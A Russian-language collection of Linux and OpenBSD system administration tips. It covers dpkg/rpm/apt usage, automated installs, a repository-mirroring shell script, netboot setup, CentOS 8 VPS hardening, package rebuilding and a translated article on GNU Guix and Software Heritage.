Установка одного пакета: dpkg -i <.deb file name> Пример: dpkg -i avg71flm_r28-1_i386.deb Рекурсивная установка группы пакетов помещенных в директорию: dpkg -R Пример: dpkg -R /usr/local/src Распаковать пакет, но не переходить на стадию конфигурации: dpkg --unpack package_file Пример: dpkg --unpack avg71flm_r28-1_i386.deb Выполнить стадию конфигурирования для ранее распакованного пакета: dpkg --configure package Пример: dpkg --configure avg71flm_r28-1_i386.deb Удаление ранее установленного пакета, с сохранением файлов конфигурации: dpkg -r Пример: dpkg -r avg71flm_r28-1_i386.deb Удаление ранее установленного пакета, с удалением файлов конфигурации: dpkg -P Пример: dpkg -P avg71flm Обновление информации о доступных для установки пакетах из файла "Packages.dpkg" dpkg --update-avail <Packages-file> Добавление (комбинирование) информации о дополнительных пакетах из файла "Packages.dpkg" dpkg --merge-avail <Packages-file> Обновление информации о пакете непосредственно из пакета: dpkg -A package_file Удалить информацию о ранее установленных, но удаленных, и теперь недоступных, пакетах: dpkg --forget-old-unavail Удалить информацию о доступности пакетов: dpkg --clear-avail Найти частично установленные пакеты: dpkg -C Отобразить различия в двух наборах пакетов: dpkg --compare-versions ver1 op ver2 Построить deb пакет: dpkg -b directory [filename] Показать содержимое пакета: dpkg -c filename Показать информацию о пакете: dpkg -I filename [control-file] Показать список пакетов удовлетворяющих маске: dpkg -l package-name-pattern Пример: dpkg -l vim Показать список всех установленных пакетов: dpkg -l dpkg --get-selections Установить пакеты, по списку сохраненному в файле: apt-get update cat файл_со_списком_пакетов| dpkg --set-selections apt-get dselect-upgrade Отобразить состояние пакета dpkg -s package-name Пример: dpkg -s ssh Показать список файлов в системе, добавленных из указанного пакета. dpkg -L package-Name Пример: dpkg -L apache2 Поиск пакета по входящему в его состав файлу: dpkg -S filename-search-pattern Пример: dpkg -S /sbin/ifconfig Вывод детальной информации о пакете: dpkg -p package-name Пример: dpkg -p cacti

Установка CentOS и FC 6 на материнские платы Intel P965 (ICH8R) с IDE-CDROM Автор: Державец Борис [комментарии]

Установка CentOS 4.4 (RHEL AS 4.4) и FC 6 на материнские платы с чипсетом Intel P965 & Intel ICH8R с IDE-CDROM'a. 1.Установить в BIOS режим AHCI для Intel ICH8R и Jmicron JMB363 2.На подсказке boot:linux all-generic-ide pci=nommconf 3. Cпецифицировать во время графической установки Kernel boot options : all-generic-ide pci=nommconf При установке GRUB в /boot partition выполнить: boot:linux all-generic-ide pci=nommconf rescue ................... # chroot /mnt/sysimage # df -h /dev/sdaX ....... /boot ............................. # dd if=/dev/sdaX of=linux.bin bs=512 count=1 # mcopy linux.bin a: Такой стиль установки позволяет системам успешно определять IDE-CDROM не только при установке , но и в рабочем режиме.

Как автоматизировать установку Debian и Fedora Linux (доп. ссылка 1) [обсудить]

Инсталлятор Debian можно заставить использовать файл ответов на вопросы установки (pre-seeding). Установите пакет debconf-utils apt-get install debconf-utils Создайте pre-seeding файл для повторения начальной установки: debconf-get-selections --installer > preseed.cfg Добавьте последующие изменения: debconf-get-selections >> preseed.cfg При необходимости отредактируйте preseed.cfg на свой вкус и скопируйте на дискету. В момент загрузки передайте в качестве параметра путь к preseed.cfg файлу (как опции загрузки ядра): preseed/file=/floppy/preseed.cfg debconf/priority=critical Что касается Fedora, то создать файл автоустановки можно использовав пакет system-config-kickstart: yum -y install system-config-kickstart /usr/sbin/system-config-kickstart После запуска в диалоговом режиме будет сформировано содержание файла ks.cfg, информацию о котором нужно передать как параметр при загрузке: linux ks=/floppy/ks.cfg

Локальный репозитарий CentOS через HTTP proxy [комментарии]

До появления прямого соединения с интернетом (провайдером был открыт только http), было довольно проблематично поддерживать локальный репозитарий пакетов в актуальном состоянии. Для выхода из подобной ситуации был написан следующий скрипт, который в некотором приближении заменяет rsync. #!/bin/sh cd /opt/rpm-update #mirror_base_url=http://ftp.belnet.be/packages/centos/4.3/os/i386/CentOS/RPMS/ #mirror_update_url=http://ftp.belnet.be/packages/centos/4.3/updates/i386/RPMS/ mirror_base_url=$1 local_rpm_directory=$2 #local_rpm_directory=/var/ftp/pub/centos-4.3/ file_html=./index.html file_rpms=./files.log rm -f $file_html rm -f $file_rpms echo "---------------------------------------------------------" echo "obtaining file list from $mirror_base_url ..." wget -q --no-cache $mirror_base_url echo "ok." cut -d"=" $file_html -f4 | cut -d"\"" -f2 | grep rpm | sort > $file_rpms a=`cat $file_rpms` for cur_rpm in $a do cur_rpm_file=$local_rpm_directory$cur_rpm if [ -e $cur_rpm_file ] then echo "$cur_rpm exist." > /dev/null else echo "downloading $cur_rpm ..." wget -q --no-cache $mirror_base_url$cur_rpm echo "ok." mv ./$cur_rpm $local_rpm_directory fi done rm -f $file_html rm -f $file_rpms и вызов этого скрипта #!/bin/sh echo "***** run4 START ***** " >> /var/log/rpm_update4 /opt/rpm-update/lsus.sh http://ftp.belnet.be/packages/centos/4.3/updates/i386/RPMS/ /var/ftp/pub/centos-4.3/ >> /var/log/rpm_update4 /opt/rpm-update/lsus.sh http://ftp.belnet.be/packages/centos/4.3/os/i386/CentOS/RPMS/ /var/ftp/pub/centos-4.3/ >> /var/log/rpm_update4 /opt/rpm-update/lsus.sh http://ftp.belnet.be/packages/centos/4.3/extras/i386/RPMS/ /var/ftp/pub/centos-4.3/ >> /var/log/rpm_update4 echo "generating headers..." >> /var/log/rpm_update4 yum-arch -q /var/ftp/pub/centos-4.3/ echo "ok." >> /var/log/rpm_update4 echo "generating repo..." >> /var/log/rpm_update4 createrepo -q /var/ftp/pub/centos-4.3/ echo "ok." >> /var/log/rpm_update4 echo "***** run4 STOP ***** " >> /var/log/rpm_update4 вызывается по крону, если на сервере появились свежие пакеты, быстренько заливает их в локальный репозитарий.

Как обновить содержимое установочного DVD для Fedora Core 5 Linux (доп. ссылка 1) Автор: Rob Garth [комментарии]

Копируем обновления на локальную машину http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/i386/ Создаем директорию, в которой будем создавать новый образ диска. mkdir -p /opt/FC_2006.4/i386 cd /opt/FC_2006.4 Монтируем оригинальный установочный диск mount -o loop /full/path/FC-5-i386-DVD.iso /mnt и синхронизируем его содержимое, за исключением rpm пакетов, в созданную ранее директорию. rsync --archive --exclude 'Fedora/RPMS/*.rpm' /mnt/ i386 Копируем только актуальные rpm пакеты для которых не было обновлений. Наличие обновлений отслеживаем при помощи утилиры novi. for fn in `novi path/to/updates /mnt/Fedora/RPMS/ | awk '{print $2}'`; do cp $fn i386/Fedora/RPMS/ done Обновляем индексные файлы cd i386 createrepo -u "media://1142397575.182477#1" -g Fedora/base/comps.xml . cd .. Создаем ISO образ и md5 слепок. mkisofs -R -J -T -v -no-emul-boot -boot-load-size 4 -boot-info-table \ -V "Fedora Core 5 (Patched.0406)" -b isolinux/isolinux.bin \ -c isolinux/boot.cat -x "lost+found" -o FC5-i386-dvd-patched.iso i386 /usr/lib/anaconda-runtime/implantisomd5 FC5-i386-dvd-patched.iso

Пример настройки сервера удаленной загрузки под Linux (доп. ссылка 1) [комментарии]

DHCP. dhcpd.conf: # расскоментировать для DHCPD 3.0 # ddns-update-style none; group { # IP address of TFTP/NFS server next-server 10.0.0.3; # The name of the file to be downloaded by the ROM filename "/tftpboot/pxelinux.0"; # A default server directory to be used as / by the clients #option root-path "/clients/shared/root"; # IP addresses of DNS servers #option domain-name-servers XX.XX.XX.XX, YY.YY.YY.YY; # IP addresses of routers #option routers AA.AA.AA.AA, BB.BB.BB.BB; # An entry for one specific client host sample-client { # Ethernet address of the client machine hardware ethernet EE:EE:EE:EE:EE:EE; # IP address to assign fixed-address 10.0.1.1; # Override root-path option for this machine # Our initial configuration will use separate # root directories for each client. option root-path "/clients/10.0.1.1/root"; } } NFS. /etc/exports на сервере: /clients/10.0.1.1/root 10.0.1.1/255.255.255.255(rw,no_root_squash) /clients/10.0.1.1/usr 10.0.1.1/255.255.255.255(rw,no_root_squash) /clients/10.0.1.1/var 10.0.1.1/255.255.255.255(rw,no_root_squash) /clients/10.0.1.1/tmp 10.0.1.1/255.255.255.255(rw,no_root_squash) /home 10.0.0.0/255.0.0.0(rw) /etc/fstab для клиента: 10.0.0.3:/clients/10.0.1.1/root / nfs rw,hard,intr,nolock 0 0 10.0.0.3:/clients/10.0.1.1/usr /usr nfs rw,hard,intr,nolock 0 0 10.0.0.3:/clients/10.0.1.1/var /var nfs rw,hard,intr,nolock 0 0 10.0.0.3:/clients/10.0.1.1/tmp /tmp nfs rw,hard,intr,nolock 0 0 10.0.0.3:/home /home nfs rw,hard,intr,nolock 0 0 Проверка NFS: mount 127.0.0.1:/clients/10.0.1.1/root /mnt /clients/shared/root/etc/init.d/netboot-dirs - скрпит монтирование разделов по NFS загрузке для клиента: #!/bin/sh IP=`ifconfig eth0 | grep inet | sed 's/.*inet //;s/ netmask.*//'` /bin/mount 10.0.0.3:/clients/$IP/var /var /bin/mount 10.0.0.3:/clients/$IP/tmp /tmp etc/init.d/netboot-dirs создание /var и /tmp разделов в ОЗУ для клиента: #!/bin/sh # File: etc/init.d/netboot-dirs # Initialize a 1MB /var /sbin/mke2fs -q /dev/ram12 1024 /bin/mount /dev/ram12 /var /bin/chown 0:0 /var /bin/chmod 755 /var # Create some needed dirs cd /var /bin/mkdir -p --mode=755 run lib log/news spool/cron/crontabs /bin/mkdir -p --mode=1777 tmp lock # Initialize a 4MB /tmp # -N option tunes this for small files /sbin/mke2fs -q -N 2048 /dev/ram11 4096 /bin/mount /dev/ram11 /tmp /bin/chown 0:0 /tmp /bin/chmod 1777 /tmp

Формирование списка имен RPM пакетов и зависимостей в Linux (доп. ссылка 1) Автор: uldus [комментарии]

Формирование списка названий пакетов (не полных имен): rpm -q -a --queryformat '%{NAME}\n' Как после установки группы пакетов через "rpm -i --nodeps", проверить каких зависимостей не хватает: rpm -q -a --queryformat '%{NAME}\n'|sort|uniq > list_inst.txt cat list_inst.txt| xargs -l1 rpm -q -R |grep -E "[<=>]"| cut -d ' ' -f1| cut -d '(' -f1| sort| uniq > list_req.txt diff list_inst.txt list_req.txt| grep '>' > missing.txt

Установка Domino R 6.5 на Linux Автор: Gennadi Kalaschnikow [комментарии]

Для инсталляци Domino R6.5 необходимо в файле .bashrc, который находиться в директории юзера "notes" сделать такую запись: export LD_ASSUME_KERNEL = 2.2.5

Подсказка по использованию APT [комментарии]

apt-get update - обновление локального кэша пакетов; apt-cache search маска - поиск нужного пакета; apt-cache show пакет - просмотр информации о пакете; apt-get install пакет - установка пакета; apt-get remove пакет - удаление пакета; apt-get update; apt-get upgrade - полное обновление системы.

Как, после сборки ядра Linux, инициализировать initrd (ядро падает при монтировании root раздела) (доп. ссылка 1) Автор: as [комментарии]

initrd - RAM-диск, инициализируемый загрузчиком, требуется для подключения модулей ядра, необходимых на этапе до монтирования root-раздела, (например, до монтирования нужно подгрузить - ext2/ext3/scsi модули). 1) man initrd - все изумительно описано; 2) после сборки ядра создаем новый initrd: mkinitrd /boot/initrd-2.4.21 2.4.21; 3) в /etc/lilo.conf: initrd=/boot/initrd-2.4.21 В mkinitrd сам initrd можно назвать как угодно, но второй параметр обязательно версия ядра.

Как в RedHat управлять из командной строки runlevel (init.d) скриптами [комментарии]

Перезапуск сервисов: service имя start service имя stop service имя restart Добавление или удаление сервисов (удобнее использовать утилиту ntsysv, sysvconfig или rcconf): chkconfig --list chkconfig --add имя chkconfig --del имя chkconfig [--level уровень] имя <on|off|reset>

Подсказка по опциям RPM. [обсудить]

Установка пакетов: rpm -i <пакеты> Деинсталляция пакета: rpm -e <пакеты> Обновление или установка пакетов: rpm -U <пакеты> Только обновление пакетов если они ранее установлены: rpm -F <пакеты> Полезно: --force -установить несмотря ни на что, --nodeps - без проверки зависимости, -vh - приятный вывод, --test - проверка. Информация о пакете: rpm -q <пакет> Список всех пакетов в системе: rpm -q -a Узнать какому пакету принадлежит файл: rpm -q -f <файл> Полезно: -i - более полное описание пакета, -R - список зависимостей пакета, -l - список файлов в пакете, -c - список конфигов в пакете, -d - список документации. Установка из исходников: rpm --recompile <srpm> , собрать бинарный пакет: rpm --rebuild <srpm>. Перестроить базу: rpm --rebuilddb

Как вручную распаковать rpm файл [комментарии]

rpm2cpio file.rpm | cpio -idmuv --no-absolute-filenames

Как узнать к какому пакету принадлежит файл [комментарии]

rpm -qf file

Первоначальная настройка VPS сервера на базе CentOS 8 Автор: KoD [комментарии]

В наши дни многие информационные сервисы работают на виртуальных машинах. На рынке появляется огромное количество поставщиков услуг виртуализации, у которых можно получить VPS по вполне вменяемым ценам. В этой статье я хотел бы поделиться своим вариантом первоначальной настройки виртуалки на базе CentOS 8 и принять рекомендации по её улучшению. Предполагается, что VPS предназначена для разработки/тестирования/презентации WEB-приложения в общем случае, т.е. не ориентируясь на какие-либо специфические особенности и среды программирования. Первые шаги Во-первых, после установки необходимо создать непривилегированного пользователя: # groupadd user # useradd -m -d /home/user -s /bin/bash -g user -G wheel user # passwd user Сгенерировать пару криптографических ключей (на клиентской машине) следующей командой: client$ ssh-keygen -t ed25519 И перенести открытый ключ на сервер: client$ ssh-copy-id user@example.ru Затем задать более безопасные настройки для демона sshd (на сервере). Под X.X.X.X понимается IP-адрес клиента, с которого будет происходить соединение на VPS. # sed -i 's/PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config # sed -i 's/PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config # echo "AllowUsers user@X.X.X.X user@X.X.X.*" >> /etc/ssh/sshd_config # systemctl restart sshd.service После выхода из под учётной записи администратора, можно соединиться с сервером по SSH и продолжить дальнейшую настройку. Далее следует файрволл. Его настраиваем так, чтобы на 22 порт SSH могли подключаться пользователи из авторизованной подсети, а остальные соединения отбрасывались: $ sudo firewall-cmd --zone=internal --add-source=X.X.X.X/32 --add-source=X.X.X.0/24 $ sudo firewall-cmd --zone=internal --add-service=ssh $ sudo firewall-cmd --zone=public --remove-service=ssh $ sudo firewall-cmd --zone=public --add-service=http --add-service=https $ sudo firewall-cmd --get-active-zones internal sources: X.X.X.X/32 X.X.X.0/24 public interfaces: ens3 $ sudo firewall-cmd --runtime-to-permanent $ sudo firewall-cmd --reload Опять же, под X.X.X.X понимается IP-адрес клиента, с которого будет происходить соединение на VPS. Установка программного обеспечения Прежде всего следует обновить систему до актуального состояния и перезагрузиться: $ sudo dnf upgrade --refresh $ sudo reboot Затем установим необходимое для разработки программы: $ sudo dnf groupinstall "Development tools" $ sudo dnf install clang Clang устанавливаю, как дополнение к GCC для кроссплатформенной компиляции разработок. Установка и настройка СУБД Из основного репозитория качаем клиент, сервер и заголовки MariaDB. Запускаем, проверяем, и настраиваем СУБД $ sudo dnf install mariadb mariadb-server mariadb-devel $ sudo systemctl start mariadb $ sudo systemctl status mariadb Active: active (running) $ sudo systemctl enable mariadb Created symlink /etc/systemd/system/mysql.service > /usr/lib/systemd/system/mariadb.service. Created symlink /etc/systemd/system/mysqld.service > /usr/lib/systemd/system/mariadb.service. Created symlink /etc/systemd/system/multi-user.target.wants/mariadb.service > /usr/lib/systemd/system/mariadb.service. Скрипт mysql_secure_installation устанавливает пароль для root MariaDB и выключает небезопасные настройки. Далее можно создать БД и пользователей. $ sudo mysql_secure_installation $ mysql -u root -p mysql> CREATE DATABASE `mydb`; mysql> GRANT USAGE ON *.* TO 'user'@localhost IDENTIFIED BY 'mypassword'; mysql> GRANT ALL privileges ON `mydb`.* TO 'user'@localhost; mysql> FLUSH PRIVILEGES; mysql> SHOW GRANTS FOR 'user'@localhost; Первоначальная настройка MariaDB завершена. Установка и настройка HTTPD apache2 Ниже следует установка сервера httpd. В качестве менеджера SSL-сертификатов будем использовать certbot из репозитория EPEL: $ sudo dnf install httpd $ sudo dnf install epel-release $ sudo dnf install certbot python3-certbot-apache mod_ssl Добавляем виртуальный хост в конфиг сервера. Предполагается, что DNS имя сервера уже зарегистрировано и делегировано, создана A-запись на IP VPS. $ vi /etc/httpd/conf.d/vhosts.conf <VirtualHost *:80> ServerAdmin webmaster@example.ru ServerName example.ru ServerAlias www.example.ru DocumentRoot /var/www/html/example.ru/ <Directory "/var/www/cgi-bin"> AllowOverride None Options +ExecCGI AddHandler cgi-script .cgi .sh Require all granted </Directory> </VirtualHost> Эта конфигурация так же включает выполнение CGI-скриптов на стороне сервера, так что можно приступать к разработке WEB-приложений после перезагрузки сервиса: $ sudo systemctl enable httpd $ sudo systemctl start httpd Не забываем получить сертификаты в центре сертификации Let`s Encrypt: $ sudo certbot -d example.ru -d www.example.ru Вышеизложенный порядок действий не обязательно каждый раз делать вручную. Можно написать и отладить простой shell-скрипт, который проделает все операции в автоматическом режиме и первоначальная настройка VPS сервера займёт незначительное время.

Связывание повторяемых сборок GNU Guix с архивом исходных текстов Software Heritage (доп. ссылка 1) Автор: znavko [комментарии]

Перевод статьи Людвика Курте от 29.03.2019, опубликованной в блоге Guix. В статье рассказано как в дистрибутиве GNU Guix связать повторяемые сборки, позволяющие убедиться в тождественности бинарных файлов эталонным исходным текстам, с загрузкой исходных текстов из архива кода Software Heritage. Software Heritage ставит перед собой задачу создания полного архива всех доступных в Сети исходных текстов. Код загружается из разных источников (GitHub, репозитории Debian, коллекции GNU и т.п.) с автоматическим переносом информации об изменениях, формируя таким образом историю развития кода разных проектов (можно посмотреть каким код был в разное время). В Guix можно использовать Software Heritage для получения кода, если репозиторий из которого собран пакет перестал существовать. В контексте повторяемых сборок пользователь может загрузить из Software Heritage состояние кода проекта, соответствующее имеющемуся бинарному пакету, и проверить, что бинарные файлы собраны именно из этого кода без добавления скрытых изменений. GNU Guix может использоваться как пакетный менеджер, чтобы устанавливать и обновлять пакеты ПО. Также Guix может выступать менеджером окружения, создавать контейнеры или виртуальные машины, управлять операционной системой на компьютере. Ключевым отличием GNU Guix, выделяющим его среди других подобных инструментов, является воспроизводимость. Для пользователя это означает следующее. Пользователь задаёт в конфигурационном файле программное окружение и запускает его установку. Пользователи могут делиться конфигурацией окружения с другими, чтобы воспроизвести или адаптировать его для своих нужд. Эта особенность играет ключевую роль для разработки программного обеспечения, так как чтобы получить результат внедрения программы в программное окружение, вначале нужно воспроизвести программное окружение. Этой темой мы занимаемся в рамках проекта Guix-HPC. На программном уровне это означает, что Guix, как и другие проекты сообщества Reproducible Builds, производит сверку результатов воспроизводимой сборки, бит за битом. В вопросе воспроизводимости Guix ушёл вперёд. Пользователю Guix, можно сказать, доступна машина времени, позволяющая запустить окружение с предыдущими версиями пакетов. Но оставался один нюанс, который не позволял использовать эту технологию на практике - стабильный архив исходного кода. Тогда и появился Software Heritage (SWH). Когда исходный код исчезает Guix содержит тысячи описаний пакетов. Каждое описание пакета задаёт URL исходного кода пакета и хеш, зависимости и процедуру сборки. В большинстве случаев исходный код пакета - это архив, извлекаемый с сайта, но всё чаще исходный код ссылается на конкретную ревизию, размещённую в системе управления версиями. Что происходит, если ссылка на исходный код становится нерабочей? Все усилия, обеспечивающие воспроизводимость, не работают, когда исчезает исходный код. Исходный код, действительно, исчезает, более того, он может быть изменён в источнике. В GNU мы предоставляем стабильный хостинг, где размещаются релизы почти навсегда, без изменений (с незначительными редкими изменениями). Но большое количество свободного программного обеспечения в Интернете размещается на личных сайтах, которые имеют непродолжительное время жизни, или на коммерческих хостингах, которые работают и закрываются. По умолчанию Guix ищет исходный код по хешу в кэше наших серверов сборки. Бесплатно механизм подстановок расширяет функционал сборки, включая скачивание. Однако ограничения не позволяют нашим серверам сборки хранить весь исходный код всех пакетов долгое время. Так что вполне вероятно, что пользователь не сможет пересобрать пакет через месяцы или годы, просто потому что исходный код переместился или исчез. Работа с архивом Совершенно ясно, что для обеспечения воспроизводимых сборок должен быть постоянный доступ к исходному коду. Архив Software Heritage позволит нам воспроизводить программное окружение через годы вопреки непостоянству хостингов. Миссия Software Heritage - сохранить весь когда либо опубликованный исходный код, включая историю версий. Этот архив уже периодически поглощает релизы ПО с серверов GNU, репозитории с GitHub, пакеты PyPI и многое другое. Мы предусмотрели политику, по которой Guix будет обращаться к архиву Software Heritage при невозможности скачать исходный код из источника. Описания пакетов при этом не нуждаются в изменениях: они всё ещё указывают на первоначальный URL, но механизм скачки прозрачно работает с Software Heritage, когда необходимо. В Guix есть два типа скачивания исходных кодов: скачивание архива и осуществление контроля изменений версий. В первом случае взаимодействие с Software Heritage очень простое: Guix выполняет поиск по хешу SHA256, который ему известен, используя интерфейс архива. Выборка истории изменения версий более сложная. В этом случае вначале необходимо определить идентификатор коммита, чтобы обратиться к нужной ревизии на Software Heritage. Код ревизии затем будет доступен через API хранилища. Хранилище (Vault API) позволяет получить архив, соответствующий определённой ревизии пакета. Однако ясно, что не все ревизии доступны в качестве архивов, так что хранилище имеет интерфейс, через который можно запросить подготовку нужной ревизии. Подготовка асинхронная и может занимать некоторое время. В настоящее время, если ревизия недоступна, механизм скачивания Guix запрашивает и ждёт его готовности. Процесс может занять некоторое время, но в итоге завершается успешно. Вот так! С этого момента мы собрали цепочку. Благодаря Software Heritage, который предоставляет стабильный архив, воспроизводимая сборка Guix работает. Этот код был внедрён в ноябре 2018, создав первый свободный дистрибутив, основанный на стабильном архиве. Новые вызовы Мы достигли цели и сделали её осязаемой, но нам известно о недостатках. Во-первых, даже если программное обеспечение, которое описано в наших пакетах, доступно в виде архивов, Software Heritage содержит относительно немногие из них. Software Heritage поглощает архивы, особенно те, которые найдены на серверах GNU, но он нацелен в первую очередь на сохранение репозиториев систем управления версиями, а не архивов релизов. Нам всё ещё неясно, что делать с обычными старыми архивами. С одной стороны, они есть и не могут быть проигнорированы. Более того, многие содержат артефакты, которых нет в системе управления версими, например, скрипты configure, и довольно часто они сопровождаются криптографическими подписями разработчиков, которые позволяют получателям подтвердить код - важная информация, которая часто отсутствует в системе управления версиями. С другой стороны, теги систем управления версиями всё чаще становятся механизмом распространения релизов программ. Вполне вероятно, что теги станут главным механизмом распространения ПО в ближайшем будущем. Теги систем управления версиями тоже не идеальны, так как они изменчивы и привязаны к репозиторию. С другой стороны, идентификаторы коммита Git совершенно точно указывают на нужную версию пакета, так как они относятся к пакету и не зависят от репозитория. Но наши описания пакетов часто ссылаются на теги, а не коммиты, так как это даёт понять, что пакет ссылается на актуальный релиз, а не обычную ревизию (такой вот треугольник Zooko). Есть и другая проблема, которая происходит из того, что Guix вычисляет хеш версии пакета иначе, чем Software Heritage. Оба вычисляют хеш по файлам директории, но они упорядочивают файлы в разных последовательностях (SWH сериализует директории как дерево Git, а Guix использует "нормализованный архив", или Nars, формат, который использует демон сборки, наследованный от Nix). Это не позволяет Guix искать ревизии по хешу содержимого. Решением вероятно будет добавление в Guix поддержки такого метода, как в Software Heritage, ну, или Software Heritage добавит метод Guix. Ожидание завершения подготовки архива также может вызывать проблемы. Команда Software Heritage внедряет возможность автоматического добавления тегов в систему управления версиями. Таким образом, нужные ревизии почти всегда будут доступны в хранилище. Также мы не гарантируем, что программы, поставляемые Guix, доступны в качестве архива. Мы запросили Software Heritage периодически скачивать исходный код программного обеспечения, поставляемого Guix. Движемся далее Работая над поддержкой Software Heritage, мы включили в Guix модуль Guile, реализующий HTTP-интерфейс Software Heritage. Вот некоторые вещи, которые он умеет: (use-modules (guix swh)) ;; Check whether SWH has ever crawled our repository. (define o (lookup-origin "https://git.savannah.gnu.org/git/guix.git")) => #{{origin> id: 86312956 ...> ;; It did! When was its last visit? (define last-visit (first (origin-visits o))) (date->string (visit-date last-visit)) => "Fri Mar 29 10:07:45Z 2019" ;; Does it have our "v0.15.0" Git tag? (lookup-origin-revision "https://git.savannah.gnu.org/git/guix.git" "v0.15.0") => #{{revision> id: "359fdda40f754bbf1b5dc261e7427b75463b59be" ...> Guix также является библиотекой Guile, так что используя guix и swh, мы получаем интересные вещи: (use-modules (guix) (guix swh) (gnu packages base) (gnu packages golang)) ;; This is our GNU Coreutils package. coreutils => #{package coreutils@8.30 gnu/packages/base.scm:342 1c67b40> ;; Does SWH have its tarball? (lookup-content (origin-sha256 (package-source coreutils)) "sha256") => #{{content> checksums: (("sha1" ...)) data-url: ...> ;; Our package for HashiCorp's Configuration Language (HCL) is ;; built from a Git commit. (define commit (git-reference-commit (origin-uri (package-source go-github-com-hashicorp-hcl)))) ;; Is this particular commit available in the archive? (lookup-revision commit) => #{{revision> id: "23c074d0eceb2b8a5bfdbb271ab780cde70f05a8" ...> В настоящее время мы используем этот инструментарий, но конечно, это не всё, что мы можем. Например, можно выяснить, какие пакеты Guix добавлены. Также можно запросить архив исходного кода каждого пакета с помощью интерфейса 'save code', но однако есть ограничения по скорости. Подведём итоги Поддержка Software Heritage в Guix даёт для воспроизводимого развёртывания стабильный архив исходного кода и полное резервирование ранних версий. Впервые мы получили пакетный менеджер, который может пересобирать предыдущие версии программ. Это имеет практическую выгоду в области воспроизводимости: мы можем создавать воспроизводимое программное окружение - основу воспроизводимых экспериментов в области разработки ПО. Собственно, мы можем предоставить инструменты загрузки программного обеспечения с доступом к ранним версиям. Да и сам Guix резервируется, так что мы выходим на метауровень, когда мы можем ссылаться на ревизии Guix, ссылаясь на ревизии пакетов, предоставляемые им. Есть барьеры, которые необходимо преодолеть, но результат уже обозрим.

Использование slackpkg для chroot Автор: АнкхС [комментарии]

Можно назначить переменную окружения export ROOT=/mychroot После этого slackpkg начинает обработку корня относительно каталога /mychroot и выполнив, например slackpkg update slackpkg install a Все пакеты и пакетная база попадут в иерархию, относительно каталога, определённого в переменной окружения ROOT.

Пересборка пакетов для Ubuntu (Debian) (доп. ссылка 1) Автор: Davidov [комментарии]

Думаю, практически все понимают преимущества пакетных менеджеров над установкой при помощи ./configure && make && make install. На примере недавно появившегося патча для Pidgin я хочу показать, как легко пересобирать пакеты в deb-based дистрибутивах. Подготовка. Нам понадобятся следующие пакты: devscripts build-essential fakeroot sudo apt-get install devscripts build-essential fakeroot Скачиваем исходники. Для этого должны быть подключены соответствующие репозитории. Нам нужен libpurple0, т.к. патч относится к этой библиотеке. На самом же деле libpurple, pidgin и pidgin-data имеют общий исходник, там что мы можем написать как apt-get source libpurple0 так и apt-get source pidgin Обратите внимание, что apt-get source надо делать не из под sudo. Исходники скачиваются в текущую директорию. Патчим. wget http://launchpadlibrarian.net/15741199/pidgin-2.4.2-icq.patch cd pidgin-2.4.1 patch -p0 < ../pidgin-2.4.2-icq.patch Устанавливаем зависимости, необходимые для сборки: sudo apt-get build-dep libpurple0 Пересобираем пакет (из той же директории) debuild -us -uc Получившийся пакет устанавливаем: cd .. sudo dpkg -i libpurple0_2.4.1-1ubuntu2_amd64.deb Если у вас i386-дистрибутив, то пакет будет называться libpurple0_2.4.1-1ubuntu2_i386.deb.

Установка ATI Catalyst 8.5 в Ubuntu 8.04 (доп. ссылка 1) Автор: Pronix [комментарии]

1. Скачать ati-driver-installer-8-5-x86.x86_64.run 2. В консоли выполнить для синхронизации списка пакетов, доступных в репозиториях: sudo apt-get update Затем, установить пакеты, необходимые для сборки модуля ядра из исходных текстов и создания deb пакета: sudo apt-get install build-essential fakeroot dh-make debhelper debconf libstdc++5 dkms linux-headers-$(uname -r) 3. В консоли запускаем инсталлятор драйвера в режиме создания пакетов: sudo sh ati-driver-installer-8-5-x86.x86_64.run --buildpkg Ubuntu/8.04 4. Теперь нужно занести в черный список драйвер fglrx из репозитория Ubuntu, выполняем sudo gedit /etc/default/linux-restricted-modules-common и в строке "DISABLED_MODULES" добавляем "fglrx" получаем строку: DISABLED_MODULES="fglrx" сохраняем файл 5. далее в консоли устанавливаем подготовленные пакеты с драйвером: sudo dpkg -i xorg-driver-fglrx_8.493*.deb fglrx-kernel-source_8.493*.deb fglrx-amdcccle_8.493*.deb 6. Перезагружаем X сервер. 7. проверяем: $ fglrxinfo display: :0.0 screen: 0 OpenGL vendor string: ATI Technologies Inc. OpenGL renderer string: Radeon X1900 Series OpenGL version string: 2.1.7537 Release PS: все вышесказанное проверялось на i386 конфигурации с видеокартой X1900, для amd64 возможны небольшие отличая в установке. Оригинал: http://pronix.isgreat.org/news.php?item.86.5

OpenBSD

Настройка PPTP Client под управлением OpenBSD (доп. ссылка 1) Автор: dreamcatcher.ru [комментарии]

Автор: Алексей Гнедин Редактор: Олег Сафулин Используемое ПО: pptp-1.6.0.tgz , OpenBSD 3.8 (GENERIC) Особенности данного подключения состоят в том ,что VPN сервер разрешает подключатся только с авторизацией MSChapV2, и явно включённым шифрованием MPPE 128 STATELESS. cd /etc/ppp vi /etc/ppp/ppp.conf Добавляем следующие строки: default: set log Phase Chat LCP IPCP CCP tun command pptp1: set device "!/usr/local/sbin/pptp IPADDR_VPN_SERVER --nolaunchpppd" set log Phase LCP IPCP CCP tun command disable acfcomp protocomp deny acfcomp enable lqr set lqrperiod 5 set cd 5 set redial 30 set timeout 0 set authname <username> set authkey <userpass> set dial set login add! default HISADDR enable mssfixup disable ipv6cp accept MSChapV2 set mppe 128 stateless Далее: touch /etc/hosname.tun0 ; vi /etc/hostname.tun0 Добавляем следующие строки: !/usr/sbin/ppp -ddial pptp1 >/dev/null 2>&1 sysctl -w net.inet.gre.allow=1 reboot После загрузки машина автоматически соединится с VPN сервером.

Создание установочного ISO для OpenBSD 3.8. Автор: Алексей Солдатов [комментарии]

